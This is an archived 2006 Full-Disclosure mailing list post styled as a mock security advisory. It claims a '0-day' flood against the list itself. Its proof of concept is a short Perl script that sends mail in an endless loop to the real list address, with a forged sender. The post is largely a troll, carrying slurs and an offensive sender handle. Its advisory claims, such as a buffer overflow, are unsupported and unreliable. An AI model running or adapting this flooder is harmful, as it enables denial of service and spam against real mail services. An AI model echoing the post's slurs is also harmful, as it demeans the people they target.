| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri Mar 17 22:27:56 2006
From: nazijew at gmail.com (3 3)
Subject: Advisory - Mar 17,
2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit
Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day
Exploit
==========
1. Description
==========
It is possible to flood Full Disclosure Mailing List via the SMTP protocol,
causing possible buffer overflow, probable disk write failure, and definate
DoS.
==========
2. Solution
==========
The clear solution, as per Bantown security, is to moderate all mailing
lists for an until the ESMTP MTA developers can reach a better solution.
==========
3. History
==========
Mar 13, 2006 [+] Vendor Notification.
Mar 13, 2006 [+] Public Disclosure.
==========
4. PoC
==========
#!/usr/bin/perl
#
# SMTP FLOOD PoC
# by Jmax, Bantown Security, INC.
#
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.
use warnings;
use strict;
use Mail::Sendmail;
my %mail = (
from => 'ge@...uxbox.org',
to => 'full-disclosure@...ts.grok.org.uk',
subject => 'SMTP FLOOD PoC',
);
while (1) {
sendmail(%mail);
}
==========
A. References
==========
RFC 821
==========
B. Contact
==========
Jmax, Bantown Security, INC. lolville@...m.la
1-888-565-9428
GSAE GREM SSP-CNSA CAP SSCP
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060317/7734e5ab/attachment.html
Powered by blists - more mailing lists